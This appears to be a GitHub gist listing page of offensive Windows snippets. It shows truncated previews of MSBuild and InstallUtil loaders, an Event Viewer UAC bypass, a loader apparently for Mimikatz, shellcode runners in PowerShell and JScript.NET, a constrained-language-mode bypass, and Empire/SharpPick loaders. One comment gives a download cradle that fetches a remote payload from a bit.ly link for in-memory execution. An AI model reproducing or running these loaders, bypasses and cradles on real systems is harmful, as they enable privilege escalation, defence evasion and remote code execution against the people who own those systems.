Dave Hardy davehardy20
davehardy20
/ msbuilder.xml
Created
July 27, 2017 07:19
MSBuild Execute Assembly From Environment Variable
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml --> | |
| <!-- Populate the Env Var like this or many other ways: --> | |
| <!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') --> | |
| <!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered --> | |
| <!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> |
davehardy20
/ EventVwrBypass.cs
Created
July 27, 2017 07:21
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Win32; | |
| /* | |
| InstallUtil.exe C# version of Event Viewer UAC bypass |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
davehardy20
/ PoCPowerShellCoreShellcodeRunner.ps1
Created
July 27, 2017 07:24
A simple PoC shellcode runner that works in PowerShell Core on Nano Server and demonstrates how to call Win32 APIs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Author: Matthew Graeber (@mattifestation) | |
| License: BSD 3-Clause | |
| #> | |
| function Invoke-VirtualAlloc { | |
| Param ( | |
| [IntPtr] $lpAddress, | |
| [UInt32] $dwSize, | |
| [UInt32] $flAllocationType, |
davehardy20
/ Remove-ConstrainedLanguageMode.psm1
Last active
July 27, 2017 08:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Remove-ConstrainedLanguageMode { | |
| <# | |
| .Synopsis | |
| Set language mode for a powershell session to 'full'. | |
| .Description | |
| Set language mode for a powershell session to 'full'. Leverages 'InstallUtil' | |
| and the Microsoft.Diagnostics.Runtime.dll resouces to adjust in memory values. | |
| .Example |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using RGiesecke.DllExport; | |
| namespace Export | |
| { | |
| class Test | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
davehardy20
/ EmpireSCT.cs
Created
July 27, 2017 20:07
— forked from bneg/EmpireSCT.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * SharpPick aka InexorablePoSH | |
| * Description: Application to load and run powershell code via the .NET assemblies | |
| * License: 3-Clause BSD License. See Veil PowerTools Project | |
| * | |
| * This application is part of Veil PowerTools, a collection of offensive PowerShell | |
| * capabilities. Hope they help! | |
| * | |
| * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe | |
| */ |
davehardy20
/ EmpireDLL.cs
Created
July 27, 2017 20:07
— forked from bneg/EmpireDLL.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * SharpPick aka InexorablePoSH | |
| * Description: Application to load and run powershell code via the .NET assemblies | |
| * License: 3-Clause BSD License. See Veil PowerTools Project | |
| * | |
| * This application is part of Veil PowerTools, a collection of offensive PowerShell | |
| * capabilities. Hope they help! | |
| * | |
| * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe | |
| */ |
OlderNewer